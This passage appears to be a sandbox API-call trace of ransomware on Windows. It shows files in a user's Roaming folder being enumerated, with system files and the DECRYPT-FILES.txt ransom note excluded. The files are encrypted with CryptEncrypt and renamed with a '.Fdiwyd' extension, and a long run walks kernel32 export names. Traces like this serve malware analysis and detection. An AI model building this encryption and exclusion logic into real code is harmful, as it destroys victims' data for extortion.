lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0076.694] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0076.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0076.694] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0076.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0076.694] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0076.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0076.694] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0076.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0076.695] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0076.695] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7bIriEMdRI7QK.mp3") returned 63 [0076.695] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7bIriEMdRI7QK.mp3.Fdiwyd") returned 70 [0076.695] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7bIriEMdRI7QK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7biriemdri7qk.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7bIriEMdRI7QK.mp3.Fdiwyd" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7biriemdri7qk.mp3.fdiwyd"), dwFlags=0x0) returned 1 [0076.695] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.696] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.696] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.696] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1569a4b0, ftCreationTime.dwHighDateTime=0x1d4c608, ftLastAccessTime.dwLowDateTime=0x430b0f20, ftLastAccessTime.dwHighDateTime=0x1d4d4be, ftLastWriteTime.dwLowDateTime=0x430b0f20, ftLastWriteTime.dwHighDateTime=0x1d4d4be, nFileSizeHigh=0x0, nFileSizeLow=0x87a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="7zAz7ryW DljTX1J.wav", cAlternateFileName="7ZAZ7R~1.WAV")) returned 1 [0076.696] lstrcmpiW (lpString1="7zAz7ryW DljTX1J.wav", lpString2="DECRYPT-FILES.txt") returned -1 [0076.696] lstrcmpiW (lpString1="7zAz7ryW DljTX1J.wav", lpString2="autorun.inf") returned -1 [0076.696] lstrcmpiW (lpString1="7zAz7ryW DljTX1J.wav", lpString2="boot.ini") returned -1 [0076.696] lstrcmpiW (lpString1="7zAz7ryW DljTX1J.wav", lpString2="desktop.ini") returned -1 [0076.696] lstrcmpiW (lpString1="7zAz7ryW DljTX1J.wav", lpString2="ntuser.dat") returned -1 [0076.696] lstrcmpiW (lpString1="7zAz7ryW DljTX1J.wav", lpString2="iconcache.db") returned -1 [0076.696] lstrcmpiW (lpString1="7zAz7ryW DljTX1J.wav", lpString2="bootsect.bak") returned -1 [0076.696] lstrcmpiW (lpString1="7zAz7ryW DljTX1J.wav", lpString2="ntuser.dat.log") returned -1 [0076.696] lstrcmpiW (lpString1="7zAz7ryW DljTX1J.wav", lpString2="thumbs.db") returned -1 [0076.696] lstrcmpiW (lpString1="7zAz7ryW DljTX1J.wav", lpString2="Bootfont.bin") returned -1 [0076.696] lstrlenW (lpString="7zAz7ryW DljTX1J.wav") returned 20 [0076.696] lstrcmpiW (lpString1="wav", lpString2="lnk") returned 1 [0076.696] lstrcmpiW (lpString1="wav", lpString2="exe") returned 1 [0076.696] lstrcmpiW (lpString1="wav", lpString2="sys") returned 1 [0076.697] lstrcmpiW (lpString1="wav", lpString2="dll") returned 1 [0076.697] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0076.697] lstrlenW (lpString="7zAz7ryW DljTX1J.wav") returned 20 [0076.697] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0076.697] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="7zAz7ryW DljTX1J.wav" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7zAz7ryW DljTX1J.wav") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7zAz7ryW DljTX1J.wav" [0076.697] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.697] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7zAz7ryW DljTX1J.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7zaz7ryw dljtx1j.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0076.697] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=34724) returned 1 [0076.697] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0076.697] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0076.697] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0076.697] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0076.697] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.698] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0076.698] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0076.699] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.699] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0076.700] CloseHandle (hObject=0x444) returned 1 [0076.700] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.700] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0076.701] CloseHandle (hObject=0x0) returned 0 [0076.701] CloseHandle (hObject=0x440) returned 1 [0076.703] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.704] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.704] GetTickCount () returned 0x114bb06 [0076.704] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.704] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0076.704] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0076.704] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.705] lstrlenA (lpString="kernel32.dll") returned 12 [0076.705] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0076.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0076.705] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0076.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0076.705] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0076.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0076.705] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0076.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0076.705] lstrlenA (lpString="ADDATOMA") returned 8 [0076.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0076.705] lstrlenA (lpString="ADDATOMW") returned 8 [0076.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0076.705] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0076.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0076.705] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0076.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0076.705] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0076.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0076.705] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0076.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0076.705] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0076.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0076.706] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0076.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0076.706] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0076.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0076.706] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0076.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0076.706] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0076.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0076.706] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0076.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0076.706] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0076.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0076.706] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0076.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0076.706] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0076.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0076.706] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0076.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0076.706] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0076.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0076.706] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0076.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0076.706] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0076.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0076.706] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0076.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0076.706] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0076.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0076.706] lstrlenA (lpString="BACKUPREAD") returned 10 [0076.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0076.706] lstrlenA (lpString="BACKUPSEEK") returned 10 [0076.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0076.706] lstrlenA (lpString="BACKUPWRITE") returned 11 [0076.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0076.706] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0076.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0076.707] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0076.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0076.707] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0076.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0076.707] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0076.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0076.707] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0076.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0076.707] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0076.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0076.707] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0076.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0076.707] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0076.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0076.707] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0076.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0076.707] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0076.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0076.707] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0076.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0076.707] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0076.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0076.707] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0076.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0076.707] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0076.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0076.707] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0076.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0076.707] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0076.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0076.707] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0076.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0076.707] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0076.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0076.708] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0076.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0076.708] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0076.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0076.708] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0076.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0076.708] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0076.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0076.708] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0076.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0076.708] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0076.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0076.708] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0076.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0076.708] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0076.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0076.708] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0076.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0076.708] lstrlenA (lpString="BEEP") returned 4 [0076.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0076.708] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0076.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0076.708] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0076.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0076.708] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0076.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0076.708] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0076.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0076.708] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0076.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0076.708] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0076.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0076.708] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0076.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0076.709] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0076.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0076.709] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0076.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0076.709] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0076.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0076.709] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0076.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0076.709] lstrlenA (lpString="CANCELIO") returned 8 [0076.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0076.709] lstrlenA (lpString="CANCELIOEX") returned 10 [0076.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0076.709] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0076.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0076.709] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0076.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0076.709] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0076.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0076.709] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0076.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0076.709] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0076.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0076.709] lstrlenA (lpString="CHECKELEVATION") returned 14 [0076.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0076.709] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0076.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0076.709] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0076.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0076.709] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0076.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0076.709] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0076.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0076.709] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0076.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0076.709] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0076.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0076.710] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0076.710] lstrcpyA (in: 